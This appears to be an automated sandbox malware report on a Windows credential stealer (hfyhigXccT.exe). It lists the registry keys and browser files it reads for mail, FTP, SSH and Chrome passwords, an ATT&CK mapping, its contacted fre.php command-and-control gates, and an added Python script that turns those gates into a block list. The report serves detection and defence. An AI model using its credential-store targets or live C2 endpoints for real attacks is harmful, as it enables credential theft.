              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

Source: Yara match | File source: 5.0.hfyhigXccT.exe.400000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.hfyhigXccT.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.hfyhigXccT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.hfyhigXccT.exe.400000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.hfyhigXccT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.hfyhigXccT.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: hfyhigXccT.exe PID: 6448, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: hfyhigXccT.exe PID: 6764, type: MEMORYSTR
Source: C:\Users\user\Desktop\hfyhigXccT.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\hfyhigXccT.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Users\user\Desktop\hfyhigXccT.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\hfyhigXccT.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Source: C:\Users\user\Desktop\hfyhigXccT.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\hfyhigXccT.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\hfyhigXccT.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\hfyhigXccT.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\hfyhigXccT.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
MITRE ATT&CK Matrix (listed per tactic column; a number in parentheses is the badge printed beside that technique in the report)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: Process Injection (11); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (21); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12)
Credential Access: OS Credential Dumping (2); Credentials in Registry (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery (11); Process Discovery (1); Virtualization/Sandbox Evasion (21); Remote System Discovery (1); System Information Discovery (13); System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Email Collection (1); Archive Collected Data (11); Data from Local System (2); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (112); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Initial sample:
Source | Detection | Scanner | Label | Link
hfyhigXccT.exe | 100% | Joe Sandbox ML | |

Dropped files: No Antivirus matches

Unpacked PE files:
Source | Detection | Scanner | Label | Link | Download
5.0.hfyhigXccT.exe.400000.14.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
5.0.hfyhigXccT.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
0.2.hfyhigXccT.exe.4395410.11.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
5.2.hfyhigXccT.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
0.2.hfyhigXccT.exe.437b3f0.10.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
5.0.hfyhigXccT.exe.400000.8.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
5.0.hfyhigXccT.exe.400000.12.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
5.0.hfyhigXccT.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
5.0.hfyhigXccT.exe.400000.10.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
Domains:
Source | Detection | Scanner | Label | Link
sempersim.su | 27% | Virustotal | | Browse
URLs (most entries are font-vendor strings carried in embedded font metadata, often with a trailing garbage character; the only scanner-flagged URL is the sempersim.su gate):
Source | Detection | Scanner | Label | Link
http://www.sajatypeworks.com2 | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
http://www.ibsensoftware.com/ | 0% | URL Reputation | safe |
http://sempersim.su/gh20/fre.php | 22% | Virustotal | | Browse
http://sempersim.su/gh20/fre.php | 100% | Avira URL Cloud | malware |
http://www.tiro.com | 0% | URL Reputation | safe |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/7 | 0% | URL Reputation | safe |
http://fontfabrik.com | 0% | URL Reputation | safe |
http://www.fontbureau.comtto9 | 0% | Avira URL Cloud | safe |
http://www.galapagosdesign.com/9q | 0% | Avira URL Cloud | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/Y0 | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/% | 0% | URL Reputation | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
http://www.sajatypeworks.come | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/ | 0% | URL Reputation | safe |
http://www.fontbureau.comF | 0% | URL Reputation | safe |
http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe |
http://www.founder.com.cn/cnscr | 0% | Avira URL Cloud | safe |
http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/M | 0% | URL Reputation | safe |
http://www.fontbureau.comM | 0% | Avira URL Cloud | safe |
http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe |
http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
http://www.fontbureau.comrsivb | 0% | Avira URL Cloud | safe |
http://www.jiyu-kobo.co.jp/i | 0% | URL Reputation | safe |
http://www.fontbureau.comituo_ | 0% | Avira URL Cloud | safe |
http://www.jiyu-kobo.co.jp/_ | 0% | URL Reputation | safe |
http://en.w= | 0% | Avira URL Cloud | safe |
Contacted domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
sempersim.su | 104.155.55.2 | true | false | | unknown
Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
http://sempersim.su/gh20/fre.php | false | 22%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
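The contacted-URL table above mixes one gate that a scanner actually flags (sempersim.su, Avira: malware) with four gates whose only lookup result is "URL Reputation: safe" but which the report itself marks Malicious=true. The following is an added example, not part of the Joe Sandbox report: a small Python triage that re-parses rows in the flattened form the text extractor produced (URL immediately followed by the Malicious flag, one bullet per scanner verdict, then the reputation word) and separates C2 candidates from the font-vendor string noise. The rows are copied from this report, except the fontbureau row, which is a constructed noise row in the same shape; the assumption that Lokibot's panel gate script is named fre.php, and the category names, are mine and not report output.

```python
import re
from urllib.parse import urlparse

# Constructed input: contacted-URL rows as the text extractor flattened them.
# The fontbureau row is an added noise row (font-metadata string), in the same shape.
REPORT_ROWS = """\
http://sempersim.su/gh20/fre.phpfalse
• 22%, Virustotal, Browse
• Avira URL Cloud: malware
unknown
http://kbfvzoboss.bid/alien/fre.phptrue
• URL Reputation: safe
unknown
http://alphastand.top/alien/fre.phptrue
• URL Reputation: safe
unknown
http://alphastand.win/alien/fre.phptrue
• URL Reputation: safe
unknown
http://alphastand.trade/alien/fre.phptrue
• URL Reputation: safe
unknown
http://www.fontbureau.com/designersfalse
high
"""

# A row line is "<url><true|false>" with no separator; the lazy match stops
# at the shortest URL that leaves "true"/"false" at end of line.
ROW_RE = re.compile(r"^(https?://\S+?)(true|false)$")
# Assumption (heuristic, not from the report): the Lokibot panel gate that the
# stealer POSTs harvested credentials to is conventionally a script named fre.php.
GATE_RE = re.compile(r"/fre\.php$")


def parse_rows(text):
    """Rebuild records from flattened report rows."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m:
            cur = {"url": m.group(1), "malicious": m.group(2) == "true",
                   "verdicts": [], "reputation": None}
            records.append(cur)
        elif cur is not None and line.startswith("•"):
            cur["verdicts"].append(line.lstrip("• ").strip())   # scanner verdict
        elif cur is not None:
            cur["reputation"] = line                             # trailing reputation word
    return records


def classify(rec):
    """c2: gate URL with a scanner malware verdict.
    hardcoded-gate: gate URL with no scanner hit that the report still flags malicious.
    noise: everything else (font copyright strings, licence URLs, ...)."""
    path = urlparse(rec["url"]).path
    if not GATE_RE.search(path):
        return "noise"
    av_hit = any("malware" in v.lower() for v in rec["verdicts"])
    if av_hit:
        return "c2"
    return "hardcoded-gate" if rec["malicious"] else "noise"


def triage(text):
    """Return {category: [url, ...]} preserving report order."""
    out = {"c2": [], "hardcoded-gate": [], "noise": []}
    for rec in parse_rows(text):
        out[classify(rec)].append(rec["url"])
    return out


def block_hosts(text):
    """Hostnames worth blocking: every gate URL, regardless of a 'safe' reputation lookup."""
    hosts = {urlparse(r["url"]).hostname
             for r in parse_rows(text) if classify(r) != "noise"}
    return sorted(hosts)


if __name__ == "__main__":
    for category, urls in triage(REPORT_ROWS).items():
        print(f"{category}: {urls}")
    print("block:", block_hosts(REPORT_ROWS))
```

The design point is in `block_hosts`: a reputation lookup of "safe" only says the URL has no prior record, so the decision keys off the report's own Malicious flag and the gate pattern rather than the scanner percentages, which is why all five fre.php hosts end up on the block list while the font-vendor string does not.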
URLs found in memory or binary data (sources are hfyhigXccT.exe memory dumps; the 21 dumps of region 0000000005F9B000 are 00000000.00000003.<id>.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp with <id> in {251224303, 251819251, 253424374, 251109332, 254256494, 251803357, 254662852, 252067592, 254588808, 250764720, 251698910, 254981466, 251899560, 252697276, 250696385, 251587341, 254920230, 251361011, 251927308, 252012786, 250643837}, referred to below as "the 5F9B000 dump set"):
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersG | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sajatypeworks.com2 | the 5F9B000 dump set | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/? | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.ibsensoftware.com/ | 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.com | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | the 5F9B000 dump set | false | URL Reputation: safe | unknown
http://www.typography.netD | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/7 | 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comtto9 | 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/9q | 00000000.00000003.261478813.0000000005FB0000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.261600713.0000000005FB0000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.261371262.0000000005FB0000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.261532870.0000000005FB0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/Y0 | 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/% | 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sandoll.co.kr | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.come | the 5F9B000 dump set | false | URL Reputation: safe | unknown
http://www.sakkal.com | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/ | 00000000.00000003.261371262.0000000005FB0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
